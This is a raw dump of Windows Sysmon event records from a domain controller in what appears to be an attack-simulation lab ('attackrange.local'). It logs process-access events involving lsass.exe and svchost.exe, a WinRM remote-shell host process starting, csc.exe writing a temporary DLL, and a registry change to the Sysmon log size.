10:39:16.874{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000301Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.874{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000300Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.874{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000299Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.874{733EE690-3C5B-5F80-0500-000000007E01}640764C:\Windows\system32\csrss.exe{733EE690-3DD4-5F80-FF02-000000007E01}4320C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000298Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.874{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD4-5F80-FF02-000000007E01}4320C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000297Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.880{733EE690-3DD4-5F80-FF02-000000007E01}4320C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{733EE690-3DD4-5F80-0C83-110000000000}0x11830c0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{733EE690-3C68-5F80-0C00-000000007E01}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000296Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.874{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000295Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.874{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000294Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.874{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000293Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.781{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000292Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.781{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000291Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.781{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000290Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.781{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000289Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.781{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000288Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.765{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 13241300x8000000000000000287Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-SetValue2020-10-09 10:39:16.687{733EE690-3DD3-5F80-FB02-000000007E01}2752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational\MaxSizeDWORD (0x12d2c000) 10341000x8000000000000000286Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.405{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000285Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.405{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000284Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.405{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000283Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.localDLL2020-10-09 10:39:16.374{733EE690-3DD4-5F80-FD02-000000007E01}2660C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\twtglkl4.dll2020-10-09 10:39:16.280 10341000x8000000000000000282Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.374{733EE690-3DD3-5F80-F802-000000007E01}47604960C:\Windows\system32\conhost.exe{733EE690-3DD4-5F80-FE02-000000007E01}4600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000281Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.374{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000280Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.374{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000279Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.374{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000278Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.374{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000277Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.374{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000276Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 